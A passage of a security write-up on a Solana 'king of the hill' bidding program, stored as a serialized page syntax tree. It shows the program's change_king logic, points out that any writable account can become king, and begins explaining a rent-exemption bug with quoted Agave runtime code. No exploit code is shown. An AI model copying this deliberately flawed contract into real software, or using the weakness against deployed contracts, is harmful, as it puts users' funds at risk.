0,"children":74201},{"class":5559,"line":6270},[74202],{"type":26,"tag":137,"props":74203,"children":74204},{"emptyLinePlaceholder":18},[74205],{"type":32,"value":6276},{"type":26,"tag":137,"props":74207,"children":74208},{"class":5559,"line":6279},[74209],{"type":26,"tag":137,"props":74210,"children":74211},{"style":5601},[74212],{"type":32,"value":74213},"#[program]\n",{"type":26,"tag":137,"props":74215,"children":74216},{"class":5559,"line":6288},[74217,74221,74226],{"type":26,"tag":137,"props":74218,"children":74219},{"style":5573},[74220],{"type":32,"value":16281},{"type":26,"tag":137,"props":74222,"children":74223},{"style":5573},[74224],{"type":32,"value":74225}," mod",{"type":26,"tag":137,"props":74227,"children":74228},{"style":5601},[74229],{"type":32,"value":74230}," king_of_the_sol {\n",{"type":26,"tag":137,"props":74232,"children":74233},{"class":5559,"line":6355},[74234,74238,74242,74247,74251,74255,74259,74263,74267,74272,74276,74281,74285,74289,74293,74297,74301],{"type":26,"tag":137,"props":74235,"children":74236},{"style":5573},[74237],{"type":32,"value":23436},{"type":26,"tag":137,"props":74239,"children":74240},{"style":5573},[74241],{"type":32,"value":16286},{"type":26,"tag":137,"props":74243,"children":74244},{"style":5682},[74245],{"type":32,"value":74246}," change_king",{"type":26,"tag":137,"props":74248,"children":74249},{"style":5601},[74250],{"type":32,"value":165},{"type":26,"tag":137,"props":74252,"children":74253},{"style":5584},[74254],{"type":32,"value":22874},{"type":26,"tag":137,"props":74256,"children":74257},{"style":5590},[74258],{"type":32,"value":7072},{"type":26,"tag":137,"props":74260,"children":74261},{"style":6009},[74262],{"type":32,"value":22883},{"type":26,"tag":137,"props":74264,"children":74265},{"style":5601},[74266],{"type":32,"value":8391},{"type":26,"tag":137,"props":74268,"children":74269},{"style":6009},[74270],{"type":32,"value":74271},"ChangeKing",{"type":26,"tag":137,"props":74273,"children":74274},{"style":5601},[74275],{"type":32,"value":9214},{"type":26,"tag":137,"props":74277,"children":74278},{"style":5584},[74279],{"type":32,"value":74280},"bid_amount",{"type":26,"tag":137,"props":74282,"children":74283},{"style":5590},[74284],{"type":32,"value":7072},{"type":26,"tag":137,"props":74286,"children":74287},{"style":6009},[74288],{"type":32,"value":8445},{"type":26,"tag":137,"props":74290,"children":74291},{"style":5601},[74292],{"type":32,"value":5671},{"type":26,"tag":137,"props":74294,"children":74295},{"style":5590},[74296],{"type":32,"value":16348},{"type":26,"tag":137,"props":74298,"children":74299},{"style":6009},[74300],{"type":32,"value":16353},{"type":26,"tag":137,"props":74302,"children":74303},{"style":5601},[74304],{"type":32,"value":22925},{"type":26,"tag":137,"props":74306,"children":74307},{"class":5559,"line":6363},[74308],{"type":26,"tag":137,"props":74309,"children":74310},{"style":5564},[74311],{"type":32,"value":74312},"        // Check that bid_amount is at least 2x last_bid_amount\n",{"type":26,"tag":137,"props":74314,"children":74315},{"class":5559,"line":6393},[74316,74320,74324,74328,74332,74336,74340,74344,74348,74353,74357,74362,74366,74370],{"type":26,"tag":137,"props":74317,"children":74318},{"style":5682},[74319],{"type":32,"value":67048},{"type":26,"tag":137,"props":74321,"children":74322},{"style":5601},[74323],{"type":32,"value":165},{"type":26,"tag":137,"props":74325,"children":74326},{"style":5584},[74327],{"type":32,"value":74280},{"type":26,"tag":137,"props":74329,"children":74330},{"style":5590},[74331],{"type":32,"value":10887},{"type":26,"tag":137,"props":74333,"children":74334},{"style":5584},[74335],{"type":32,"value":28435},{"type":26,"tag":137,"props":74337,"children":74338},{"style":5590},[74339],{"type":32,"value":470},{"type":26,"tag":137,"props":74341,"children":74342},{"style":5601},[74343],{"type":32,"value":17266},{"type":26,"tag":137,"props":74345,"children":74346},{"style":5590},[74347],{"type":32,"value":470},{"type":26,"tag":137,"props":74349,"children":74350},{"style":5601},[74351],{"type":32,"value":74352},"throne",{"type":26,"tag":137,"props":74354,"children":74355},{"style":5590},[74356],{"type":32,"value":470},{"type":26,"tag":137,"props":74358,"children":74359},{"style":5601},[74360],{"type":32,"value":74361},"last_bid_amount ",{"type":26,"tag":137,"props":74363,"children":74364},{"style":5590},[74365],{"type":32,"value":7152},{"type":26,"tag":137,"props":74367,"children":74368},{"style":5626},[74369],{"type":32,"value":10519},{"type":26,"tag":137,"props":74371,"children":74372},{"style":5601},[74373],{"type":32,"value":6430},{"type":26,"tag":137,"props":74375,"children":74376},{"class":5559,"line":6401},[74377,74382],{"type":26,"tag":137,"props":74378,"children":74379},{"style":5682},[74380],{"type":32,"value":74381},"        transfer_from_signer",{"type":26,"tag":137,"props":74383,"children":74384},{"style":5601},[74385],{"type":32,"value":6054},{"type":26,"tag":137,"props":74387,"children":74388},{"class":5559,"line":6433},[74389,74393,74397,74401,74405,74409],{"type":26,"tag":137,"props":74390,"children":74391},{"style":5590},[74392],{"type":32,"value":10269},{"type":26,"tag":137,"props":74394,"children":74395},{"style":5584},[74396],{"type":32,"value":22874},{"type":26,"tag":137,"props":74398,"children":74399},{"style":5590},[74400],{"type":32,"value":470},{"type":26,"tag":137,"props":74402,"children":74403},{"style":5601},[74404],{"type":32,"value":17266},{"type":26,"tag":137,"props":74406,"children":74407},{"style":5590},[74408],{"type":32,"value":470},{"type":26,"tag":137,"props":74410,"children":74411},{"style":5601},[74412],{"type":32,"value":74413},"payer,\n",{"type":26,"tag":137,"props":74415,"children":74416},{"class":5559,"line":6441},[74417,74421,74425,74429,74433,74437,74441,74445,74450],{"type":26,"tag":137,"props":74418,"children":74419},{"style":5590},[74420],{"type":32,"value":10269},{"type":26,"tag":137,"props":74422,"children":74423},{"style":5584},[74424],{"type":32,"value":22874},{"type":26,"tag":137,"props":74426,"children":74427},{"style":5590},[74428],{"type":32,"value":470},{"type":26,"tag":137,"props":74430,"children":74431},{"style":5601},[74432],{"type":32,"value":17266},{"type":26,"tag":137,"props":74434,"children":74435},{"style":5590},[74436],{"type":32,"value":470},{"type":26,"tag":137,"props":74438,"children":74439},{"style":5601},[74440],{"type":32,"value":74352},{"type":26,"tag":137,"props":74442,"children":74443},{"style":5590},[74444],{"type":32,"value":470},{"type":26,"tag":137,"props":74446,"children":74447},{"style":5682},[74448],{"type":32,"value":74449},"to_account_info",{"type":26,"tag":137,"props":74451,"children":74452},{"style":5601},[74453],{"type":32,"value":6082},{"type":26,"tag":137,"props":74455,"children":74456},{"class":5559,"line":6501},[74457,74462],{"type":26,"tag":137,"props":74458,"children":74459},{"style":5584},[74460],{"type":32,"value":74461},"            bid_amount",{"type":26,"tag":137,"props":74463,"children":74464},{"style":5601},[74465],{"type":32,"value":6099},{"type":26,"tag":137,"props":74467,"children":74468},{"class":5559,"line":11634},[74469,74474,74478],{"type":26,"tag":137,"props":74470,"children":74471},{"style":5601},[74472],{"type":32,"value":74473},"        )",{"type":26,"tag":137,"props":74475,"children":74476},{"style":5590},[74477],{"type":32,"value":5737},{"type":26,"tag":137,"props":74479,"children":74480},{"style":5601},[74481],{"type":32,"value":5604},{"type":26,"tag":137,"props":74483,"children":74484},{"class":5559,"line":11652},[74485],{"type":26,"tag":137,"props":74486,"children":74487},{"emptyLinePlaceholder":18},[74488],{"type":32,"value":6276},{"type":26,"tag":137,"props":74490,"children":74491},{"class":5559,"line":11697},[74492],{"type":26,"tag":137,"props":74493,"children":74494},{"style":5564},[74495],{"type":32,"value":74496},"        // Reimburse 95% of the last bid to the old king\n",{"type":26,"tag":137,"props":74498,"children":74499},{"class":5559,"line":11803},[74500,74504,74509,74513,74517,74521,74525,74529,74533,74537,74541,74545,74549,74554,74558,74562,74567],{"type":26,"tag":137,"props":74501,"children":74502},{"style":5573},[74503],{"type":32,"value":5648},{"type":26,"tag":137,"props":74505,"children":74506},{"style":5584},[74507],{"type":32,"value":74508}," to_reimburse",{"type":26,"tag":137,"props":74510,"children":74511},{"style":5590},[74512],{"type":32,"value":5593},{"type":26,"tag":137,"props":74514,"children":74515},{"style":5601},[74516],{"type":32,"value":4625},{"type":26,"tag":137,"props":74518,"children":74519},{"style":5584},[74520],{"type":32,"value":22874},{"type":26,"tag":137,"props":74522,"children":74523},{"style":5590},[74524],{"type":32,"value":470},{"type":26,"tag":137,"props":74526,"children":74527},{"style":5601},[74528],{"type":32,"value":17266},{"type":26,"tag":137,"props":74530,"children":74531},{"style":5590},[74532],{"type":32,"value":470},{"type":26,"tag":137,"props":74534,"children":74535},{"style":5601},[74536],{"type":32,"value":74352},{"type":26,"tag":137,"props":74538,"children":74539},{"style":5590},[74540],{"type":32,"value":470},{"type":26,"tag":137,"props":74542,"children":74543},{"style":5601},[74544],{"type":32,"value":74361},{"type":26,"tag":137,"props":74546,"children":74547},{"style":5590},[74548],{"type":32,"value":7152},{"type":26,"tag":137,"props":74550,"children":74551},{"style":5626},[74552],{"type":32,"value":74553}," 9500",{"type":26,"tag":137,"props":74555,"children":74556},{"style":5601},[74557],{"type":32,"value":5671},{"type":26,"tag":137,"props":74559,"children":74560},{"style":5590},[74561],{"type":32,"value":7162},{"type":26,"tag":137,"props":74563,"children":74564},{"style":5626},[74565],{"type":32,"value":74566}," 10000",{"type":26,"tag":137,"props":74568,"children":74569},{"style":5601},[74570],{"type":32,"value":5604},{"type":26,"tag":137,"props":74572,"children":74573},{"class":5559,"line":26089},[74574,74579],{"type":26,"tag":137,"props":74575,"children":74576},{"style":5682},[74577],{"type":32,"value":74578},"        transfer_from_pda",{"type":26,"tag":137,"props":74580,"children":74581},{"style":5601},[74582],{"type":32,"value":6054},{"type":26,"tag":137,"props":74584,"children":74585},{"class":5559,"line":26124},[74586,74590,74594,74598,74602,74606,74610,74614,74618],{"type":26,"tag":137,"props":74587,"children":74588},{"style":5590},[74589],{"type":32,"value":10269},{"type":26,"tag":137,"props":74591,"children":74592},{"style":5584},[74593],{"type":32,"value":22874},{"type":26,"tag":137,"props":74595,"children":74596},{"style":5590},[74597],{"type":32,"value":470},{"type":26,"tag":137,"props":74599,"children":74600},{"style":5601},[74601],{"type":32,"value":17266},{"type":26,"tag":137,"props":74603,"children":74604},{"style":5590},[74605],{"type":32,"value":470},{"type":26,"tag":137,"props":74607,"children":74608},{"style":5601},[74609],{"type":32,"value":74352},{"type":26,"tag":137,"props":74611,"children":74612},{"style":5590},[74613],{"type":32,"value":470},{"type":26,"tag":137,"props":74615,"children":74616},{"style":5682},[74617],{"type":32,"value":74449},{"type":26,"tag":137,"props":74619,"children":74620},{"style":5601},[74621],{"type":32,"value":6082},{"type":26,"tag":137,"props":74623,"children":74624},{"class":5559,"line":26132},[74625,74629,74633,74637,74641,74645],{"type":26,"tag":137,"props":74626,"children":74627},{"style":5590},[74628],{"type":32,"value":10269},{"type":26,"tag":137,"props":74630,"children":74631},{"style":5584},[74632],{"type":32,"value":22874},{"type":26,"tag":137,"props":74634,"children":74635},{"style":5590},[74636],{"type":32,"value":470},{"type":26,"tag":137,"props":74638,"children":74639},{"style":5601},[74640],{"type":32,"value":17266},{"type":26,"tag":137,"props":74642,"children":74643},{"style":5590},[74644],{"type":32,"value":470},{"type":26,"tag":137,"props":74646,"children":74647},{"style":5601},[74648],{"type":32,"value":74649},"old_king,\n",{"type":26,"tag":137,"props":74651,"children":74652},{"class":5559,"line":26140},[74653,74658],{"type":26,"tag":137,"props":74654,"children":74655},{"style":5584},[74656],{"type":32,"value":74657},"            to_reimburse",{"type":26,"tag":137,"props":74659,"children":74660},{"style":5601},[74661],{"type":32,"value":6099},{"type":26,"tag":137,"props":74663,"children":74664},{"class":5559,"line":26149},[74665,74669,74673],{"type":26,"tag":137,"props":74666,"children":74667},{"style":5601},[74668],{"type":32,"value":74473},{"type":26,"tag":137,"props":74670,"children":74671},{"style":5590},[74672],{"type":32,"value":5737},{"type":26,"tag":137,"props":74674,"children":74675},{"style":5601},[74676],{"type":32,"value":5604},{"type":26,"tag":137,"props":74678,"children":74679},{"class":5559,"line":26191},[74680],{"type":26,"tag":137,"props":74681,"children":74682},{"emptyLinePlaceholder":18},[74683],{"type":32,"value":6276},{"type":26,"tag":137,"props":74685,"children":74686},{"class":5559,"line":26224},[74687],{"type":26,"tag":137,"props":74688,"children":74689},{"style":5564},[74690],{"type":32,"value":74691},"        // Set new king\n",{"type":26,"tag":137,"props":74693,"children":74694},{"class":5559,"line":26232},[74695,74699,74703,74707,74711,74715,74719,74724,74728,74732,74736,74740,74744,74749,74753,74758],{"type":26,"tag":137,"props":74696,"children":74697},{"style":5584},[74698],{"type":32,"value":28778},{"type":26,"tag":137,"props":74700,"children":74701},{"style":5590},[74702],{"type":32,"value":470},{"type":26,"tag":137,"props":74704,"children":74705},{"style":5601},[74706],{"type":32,"value":17266},{"type":26,"tag":137,"props":74708,"children":74709},{"style":5590},[74710],{"type":32,"value":470},{"type":26,"tag":137,"props":74712,"children":74713},{"style":5601},[74714],{"type":32,"value":74352},{"type":26,"tag":137,"props":74716,"children":74717},{"style":5590},[74718],{"type":32,"value":470},{"type":26,"tag":137,"props":74720,"children":74721},{"style":5601},[74722],{"type":32,"value":74723},"king ",{"type":26,"tag":137,"props":74725,"children":74726},{"style":5590},[74727],{"type":32,"value":289},{"type":26,"tag":137,"props":74729,"children":74730},{"style":5584},[74731],{"type":32,"value":28435},{"type":26,"tag":137,"props":74733,"children":74734},{"style":5590},[74735],{"type":32,"value":470},{"type":26,"tag":137,"props":74737,"children":74738},{"style":5601},[74739],{"type":32,"value":17266},{"type":26,"tag":137,"props":74741,"children":74742},{"style":5590},[74743],{"type":32,"value":470},{"type":26,"tag":137,"props":74745,"children":74746},{"style":5601},[74747],{"type":32,"value":74748},"new_king",{"type":26,"tag":137,"props":74750,"children":74751},{"style":5590},[74752],{"type":32,"value":470},{"type":26,"tag":137,"props":74754,"children":74755},{"style":5682},[74756],{"type":32,"value":74757},"key",{"type":26,"tag":137,"props":74759,"children":74760},{"style":5601},[74761],{"type":32,"value":6267},{"type":26,"tag":137,"props":74763,"children":74764},{"class":5559,"line":26240},[74765,74769,74773,74777,74781,74785,74789,74793,74797,74802],{"type":26,"tag":137,"props":74766,"children":74767},{"style":5584},[74768],{"type":32,"value":28778},{"type":26,"tag":137,"props":74770,"children":74771},{"style":5590},[74772],{"type":32,"value":470},{"type":26,"tag":137,"props":74774,"children":74775},{"style":5601},[74776],{"type":32,"value":17266},{"type":26,"tag":137,"props":74778,"children":74779},{"style":5590},[74780],{"type":32,"value":470},{"type":26,"tag":137,"props":74782,"children":74783},{"style":5601},[74784],{"type":32,"value":74352},{"type":26,"tag":137,"props":74786,"children":74787},{"style":5590},[74788],{"type":32,"value":470},{"type":26,"tag":137,"props":74790,"children":74791},{"style":5601},[74792],{"type":32,"value":74361},{"type":26,"tag":137,"props":74794,"children":74795},{"style":5590},[74796],{"type":32,"value":289},{"type":26,"tag":137,"props":74798,"children":74799},{"style":5584},[74800],{"type":32,"value":74801}," bid_amount",{"type":26,"tag":137,"props":74803,"children":74804},{"style":5601},[74805],{"type":32,"value":5604},{"type":26,"tag":137,"props":74807,"children":74808},{"class":5559,"line":26249},[74809,74813,74817,74821,74825,74829,74833,74838,74842,74847,74851,74855,74859,74863,74868,74872,74876],{"type":26,"tag":137,"props":74810,"children":74811},{"style":5584},[74812],{"type":32,"value":28778},{"type":26,"tag":137,"props":74814,"children":74815},{"style":5590},[74816],{"type":32,"value":470},{"type":26,"tag":137,"props":74818,"children":74819},{"style":5601},[74820],{"type":32,"value":17266},{"type":26,"tag":137,"props":74822,"children":74823},{"style":5590},[74824],{"type":32,"value":470},{"type":26,"tag":137,"props":74826,"children":74827},{"style":5601},[74828],{"type":32,"value":74352},{"type":26,"tag":137,"props":74830,"children":74831},{"style":5590},[74832],{"type":32,"value":470},{"type":26,"tag":137,"props":74834,"children":74835},{"style":5601},[74836],{"type":32,"value":74837},"last_time ",{"type":26,"tag":137,"props":74839,"children":74840},{"style":5590},[74841],{"type":32,"value":289},{"type":26,"tag":137,"props":74843,"children":74844},{"style":6009},[74845],{"type":32,"value":74846}," Clock",{"type":26,"tag":137,"props":74848,"children":74849},{"style":5590},[74850],{"type":32,"value":6072},{"type":26,"tag":137,"props":74852,"children":74853},{"style":5682},[74854],{"type":32,"value":18944},{"type":26,"tag":137,"props":74856,"children":74857},{"style":5601},[74858],{"type":32,"value":16470},{"type":26,"tag":137,"props":74860,"children":74861},{"style":5590},[74862],{"type":32,"value":5715},{"type":26,"tag":137,"props":74864,"children":74865},{"style":5601},[74866],{"type":32,"value":74867},"unix_timestamp ",{"type":26,"tag":137,"props":74869,"children":74870},{"style":5573},[74871],{"type":32,"value":11428},{"type":26,"tag":137,"props":74873,"children":74874},{"style":6009},[74875],{"type":32,"value":8445},{"type":26,"tag":137,"props":74877,"children":74878},{"style":5601},[74879],{"type":32,"value":5604},{"type":26,"tag":137,"props":74881,"children":74882},{"class":5559,"line":26325},[74883],{"type":26,"tag":137,"props":74884,"children":74885},{"emptyLinePlaceholder":18},[74886],{"type":32,"value":6276},{"type":26,"tag":137,"props":74888,"children":74889},{"class":5559,"line":26358},[74890,74894],{"type":26,"tag":137,"props":74891,"children":74892},{"style":6009},[74893],{"type":32,"value":17403},{"type":26,"tag":137,"props":74895,"children":74896},{"style":5601},[74897],{"type":32,"value":16929},{"type":26,"tag":137,"props":74899,"children":74900},{"class":5559,"line":26366},[74901],{"type":26,"tag":137,"props":74902,"children":74903},{"style":5601},[74904],{"type":32,"value":5945},{"type":26,"tag":137,"props":74906,"children":74907},{"class":5559,"line":26374},[74908],{"type":26,"tag":137,"props":74909,"children":74910},{"style":5601},[74911],{"type":32,"value":6507},{"type":26,"tag":35,"props":74913,"children":74914},{},[74915],{"type":32,"value":74916},"Note this comment:",{"type":26,"tag":5503,"props":74918,"children":74919},{},[74920],{"type":26,"tag":35,"props":74921,"children":74922},{},[74923],{"type":32,"value":74924},"any writable account is allowed as a new king.",{"type":26,"tag":35,"props":74926,"children":74927},{},[74928],{"type":32,"value":74929},"...Is our assumption correct?",{"type":26,"tag":92,"props":74931,"children":74933},{"id":74932},"the-bugs-lurking-beneath",[74934],{"type":32,"value":74935},"The Bugs Lurking Beneath",{"type":26,"tag":118,"props":74937,"children":74939},{"id":74938},"bug-1-the-rent-exemption-trap",[74940],{"type":32,"value":74941},"Bug 1: The Rent-Exemption Trap",{"type":26,"tag":35,"props":74943,"children":74944},{},[74945,74947,74952],{"type":32,"value":74946},"On Solana, all accounts must maintain a ",{"type":26,"tag":84,"props":74948,"children":74949},{},[74950],{"type":32,"value":74951},"minimum balance",{"type":32,"value":74953}," of lamports to remain rent-exempt. Specifically, an account can be in one of two states:",{"type":26,"tag":3426,"props":74955,"children":74956},{},[74957,74972],{"type":26,"tag":3430,"props":74958,"children":74959},{},[74960,74965,74966],{"type":26,"tag":84,"props":74961,"children":74962},{},[74963],{"type":32,"value":74964},"Uninitialized",{"type":32,"value":17923},{"type":26,"tag":130,"props":74967,"children":74969},{"className":74968},[],[74970],{"type":32,"value":74971},"lamports = 0",{"type":26,"tag":3430,"props":74973,"children":74974},{},[74975,74980,74981],{"type":26,"tag":84,"props":74976,"children":74977},{},[74978],{"type":32,"value":74979},"Initialized",{"type":32,"value":17923},{"type":26,"tag":130,"props":74982,"children":74984},{"className":74983},[],[74985],{"type":32,"value":74986},"lamports >= rent-exempt threshold",{"type":26,"tag":35,"props":74988,"children":74989},{},[74990,74992,74997],{"type":32,"value":74991},"This rent model exists to prevent low-cost DoS attacks on validators. The key idea is that even an account with no data (i.e., zero-length data buffer) still consumes on-chain resources; specifically, ",{"type":26,"tag":84,"props":74993,"children":74994},{},[74995],{"type":32,"value":74996},"account metadata",{"type":32,"value":74998}," like its public key, owner, or lamport balance. That metadata must be stored persistently by validators, and that storage isn't free.",{"type":26,"tag":35,"props":75000,"children":75001},{},[75002,75004,75010],{"type":32,"value":75003},"So “persistent state” on Solana doesn’t just mean your program's data — it includes the base account structure itself. Even accounts with ",{"type":26,"tag":130,"props":75005,"children":75007},{"className":75006},[],[75008],{"type":32,"value":75009},"data.len() == 0",{"type":32,"value":75011}," must meet a minimum rent threshold to remain alive and avoid garbage collection by the runtime.",{"type":26,"tag":35,"props":75013,"children":75014},{},[75015,75017,75023],{"type":32,"value":75016},"This is enforced at the runtime level, and the relevant logic can be found ",{"type":26,"tag":41,"props":75018,"children":75021},{"href":75019,"rel":75020},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/svm-rent-collector/src/svm_rent_collector.rs#L117-L136",[45],[75022],{"type":32,"value":3580},{"type":32,"value":470},{"type":26,"tag":5512,"props":75025,"children":75027},{"className":5552,"code":75026,"language":5551,"meta":7,"style":7},"    fn transition_allowed(&self, pre_rent_state: &RentState, post_rent_state: &RentState) -> bool {\n        match post_rent_state {\n            RentState::Uninitialized | RentState::RentExempt => true,\n            RentState::RentPaying {\n                data_size: post_data_size,\n                lamports: post_lamports,\n            } => {\n                match pre_rent_state {\n                    RentState::Uninitialized | RentState::RentExempt => false,\n                    RentState::RentPaying {\n                        data_size: pre_data_size,\n                        lamports: pre_lamports,\n                    } => {\n                        // Cannot remain RentPaying if resized or credited.\n                        post_data_size == pre_data_size && post_lamports \u003C= pre_lamports\n                    }\n                }\n            }\n        }\n    }\n",[75028],{"type":26,"tag":130,"props":75029,"children":75030},{"__ignoreMap":7},[75031,75115,75132,75178,75198,75219,75240,75255,75272,75316,75335,75356,75377,75393,75401,75434,75441,75448,75455,75462],{"type":26,"tag":137,"props":75032,"children":75033},{"class":5559,"line":5560},[75034,75039,75044,75048,75052,75056,75060,75065,75069,75073,75078,75082,75087,75091,75095,75099,75103,75107,75111],{"type":26,"tag":137,"props":75035,"children":75036},{"style":5573},[75037],{"type":32,"value":75038},"    fn",{"type":26,"tag":137,"props":75040,"children":75041},{"style":5682},[75042],{"type":32,"value":75043}," transition_allowed",{"type":26,"tag":137,"props":75045,"children":75046},{"style":5601},[75047],{"type":32,"value":165},{"type":26,"tag":137,"props":75049,"children":75050},{"style":5590},[75051],{"type":32,"value":5694},{"type":26,"tag":137,"props":75053,"children":75054},{"style":5573},[75055],{"type":32,"value":16304},{"type":26,"tag":137,"props":75057,"children":75058},{"style":5601},[75059],{"type":32,"value":1108},{"type":26,"tag":137,"props":75061,"children":75062},{"style":5584},[75063],{"type":32,"value":75064},"pre_rent_state",{"type":26,"tag":137,"props":75066,"children":75067},{"style":5590},[75068],{"type":32,"value":7072},{"type":26,"tag":137,"props":75070,"children":75071},{"style":5590},[75072],{"type":32,"value":9725},{"type":26,"tag":137,"props":75074,"children":75075},{"style":6009},[75076],{"type":32,"value":75077},"RentState",{"type":26,"tag":137,"props":75079,"children":75080},{"style":5601},[75081],{"type":32,"value":1108},{"type":26,"tag":137,"props":75083,"children":75084},{"style":5584},[75085],{"type":32,"value":75086},"post_rent_state",{"type":26,"tag":137,"props":75088,"children":75089},{"style":5590},[75090],{"type":32,"value":7072},{"type":26,"tag":137,"props":75092,"children":75093},{"style":5590},[75094],{"type":32,"value":9725},{"type":26,"tag":137,"props":75096,"children":75097},{"style":6009},[75098],{"type":32,"value":75077},{"type":26,"tag":137,"props":75100,"children":75101},{"style":5601},[75102],{"type":32,"value":5671},{"type":26,"tag":137,"props":75104,"children":75105},{"style":5590},[75106],{"type":32,"value":16348},{"type":26,"tag":137,"props":75108,"children":75109},{"style":6009},[75110],{"type":32,"value":14641},{"type":26,"tag":137,"props":75112,"children":75113},{"style":5601},[75114],{"type":32,"value":5875},{"type":26,"tag":137,"props":75116,"children":75117},{"class":5559,"line":5412},[75118,75123,75128],{"type":26,"tag":137,"props":75119,"children":75120},{"style":5610},[75121],{"type":32,"value":75122},"        match",{"type":26,"tag":137,"props":75124,"children":75125},{"style":5584},[75126],{"type":32,"value":75127}," post_rent_state",{"type":26,"tag":137,"props":75129,"children":75130},{"style":5601},[75131],{"type":32,"value":5875},{"type":26,"tag":137,"props":75133,"children":75134},{"class":5559,"line":5417},[75135,75140,75144,75148,75152,75157,75161,75166,75170,75174],{"type":26,"tag":137,"props":75136,"children":75137},{"style":6009},[75138],{"type":32,"value":75139},"            RentState",{"type":26,"tag":137,"props":75141,"children":75142},{"style":5590},[75143],{"type":32,"value":6072},{"type":26,"tag":137,"props":75145,"children":75146},{"style":6009},[75147],{"type":32,"value":74964},{"type":26,"tag":137,"props":75149,"children":75150},{"style":5590},[75151],{"type":32,"value":6850},{"type":26,"tag":137,"props":75153,"children":75154},{"style":6009},[75155],{"type":32,"value":75156}," RentState",{"type":26,"tag":137,"props":75158,"children":75159},{"style":5590},[75160],{"type":32,"value":6072},{"type":26,"tag":137,"props":75162,"children":75163},{"style":6009},[75164],{"type":32,"value":75165},"RentExempt",{"type":26,"tag":137,"props":75167,"children":75168},{"style":5590},[75169],{"type":32,"value":30345},{"type":26,"tag":137,"props":75171,"children":75172},{"style":5573},[75173],{"type":32,"value":15060},{"type":26,"tag":137,"props":75175,"children":75176},{"style":5601},[75177],{"type":32,"value":6099},{"type":26,"tag":137,"props":75179,"children":75180},{"class":5559,"line":5642},[75181,75185,75189,75194],{"type":26,"tag":137,"props":75182,"children":75183},{"style":6009},[75184],{"type":32,"value":75139},{"type":26,"tag":137,"props":75186,"children":75187},{"style":5590},[75188],{"type":32,"value":6072},{"type":26,"tag":137,"props":75190,"children":75191},{"style":6009},[75192],{"type":32,"value":75193},"RentPaying",{"type":26,"tag":137,"props":75195,"children":75196},{"style":5601},[75197],{"type":32,"value":5875},{"type":26,"tag":137,"props":75199,"children":75200},{"class":5559,"line":5745},[75201,75206,75210,75215],{"type":26,"tag":137,"props":75202,"children":75203},{"style":5584},[75204],{"type":32,"value":75205},"                data_size",{"type":26,"tag":137,"props":75207,"children":75208},{"style":5590},[75209],{"type":32,"value":7072},{"type":26,"tag":137,"props":75211,"children":75212},{"style":5584},[75213],{"type":32,"value":75214}," post_data_size",{"type":26,"tag":137,"props":75216,"children":75217},{"style":5601},[75218],{"type":32,"value":6099},{"type":26,"tag":137,"props":75220,"children":75221},{"class":5559,"line":5850},[75222,75227,75231,75236],{"type":26,"tag":137,"props":75223,"children":75224},{"style":5584},[75225],{"type":32,"value":75226},"                lamports",{"type":26,"tag":137,"props":75228,"children":75229},{"style":5590},[75230],{"type":32,"value":7072},{"type":26,"tag":137,"props":75232,"children":75233},{"style":5584},[75234],{"type":32,"value":75235}," post_lamports",{"type":26,"tag":137,"props":75237,"children":75238},{"style":5601},[75239],{"type":32,"value":6099},{"type":26,"tag":137,"props":75241,"children":75242},{"class":5559,"line":5878},[75243,75247,75251],{"type":26,"tag":137,"props":75244,"children":75245},{"style":5601},[75246],{"type":32,"value":73195},{"type":26,"tag":137,"props":75248,"children":75249},{"style":5590},[75250],{"type":32,"value":17413},{"type":26,"tag":137,"props":75252,"children":75253},{"style":5601},[75254],{"type":32,"value":5875},{"type":26,"tag":137,"props":75256,"children":75257},{"class":5559,"line":5891},[75258,75263,75268],{"type":26,"tag":137,"props":75259,"children":75260},{"style":5610},[75261],{"type":32,"value":75262},"                match",{"type":26,"tag":137,"props":75264,"children":75265},{"style":5584},[75266],{"type":32,"value":75267}," pre_rent_state",{"type":26,"tag":137,"props":75269,"children":75270},{"style":5601},[75271],{"type":32,"value":5875},{"type":26,"tag":137,"props":75273,"children":75274},{"class":5559,"line":5909},[75275,75280,75284,75288,75292,75296,75300,75304,75308,75312],{"type":26,"tag":137,"props":75276,"children":75277},{"style":6009},[75278],{"type":32,"value":75279},"                    RentState",{"type":26,"tag":137,"props":75281,"children":75282},{"style":5590},[75283],{"type":32,"value":6072},{"type":26,"tag":137,"props":75285,"children":75286},{"style":6009},[75287],{"type":32,"value":74964},{"type":26,"tag":137,"props":75289,"children":75290},{"style":5590},[75291],{"type":32,"value":6850},{"type":26,"tag":137,"props":75293,"children":75294},{"style":6009},[75295],{"type":32,"value":75156},{"type":26,"tag":137,"props":75297,"children":75298},{"style":5590},[75299],{"type":32,"value":6072},{"type":26,"tag":137,"props":75301,"children":75302},{"style":6009},[75303],{"type":32,"value":75165},{"type":26,"tag":137,"props":75305,"children":75306},{"style":5590},[75307],{"type":32,"value":30345},{"type":26,"tag":137,"props":75309,"children":75310},{"style":5573},[75311],{"type":32,"value":11645},{"type":26,"tag":137,"props":75313,"children":75314},{"style":5601},[75315],{"type":32,"value":6099},{"type":26,"tag":137,"props":75317,"children":75318},{"class":5559,"line":5930},[75319,75323,75327,75331],{"type":26,"tag":137,"props":75320,"children":75321},{"style":6009},[75322],{"type":32,"value":75279},{"type":26,"tag":137,"props":75324,"children":75325},{"style":5590},[75326],{"type":32,"value":6072},{"type":26,"tag":137,"props":75328,"children":75329},{"style":6009},[75330],{"type":32,"value":75193},{"type":26,"tag":137,"props":75332,"children":75333},{"style":5601},[75334],{"type":32,"value":5875},{"type":26,"tag":137,"props":75336,"children":75337},{"class":5559,"line":5939},[75338,75343,75347,75352],{"type":26,"tag":137,"props":75339,"children":75340},{"style":5584},[75341],{"type":32,"value":75342},"                        data_size",{"type":26,"tag":137,"props":75344,"children":75345},{"style":5590},[75346],{"type":32,"value":7072},{"type":26,"tag":137,"props":75348,"children":75349},{"style":5584},[75350],{"type":32,"value":75351}," pre_data_size",{"type":26,"tag":137,"props":75353,"children":75354},{"style":5601},[75355],{"type":32,"value":6099},{"type":26,"tag":137,"props":75357,"children":75358},{"class":5559,"line":6191},[75359,75364,75368,75373],{"type":26,"tag":137,"props":75360,"children":75361},{"style":5584},[75362],{"type":32,"value":75363},"                        lamports",{"type":26,"tag":137,"props":75365,"children":75366},{"style":5590},[75367],{"type":32,"value":7072},{"type":26,"tag":137,"props":75369,"children":75370},{"style":5584},[75371],{"type":32,"value":75372}," 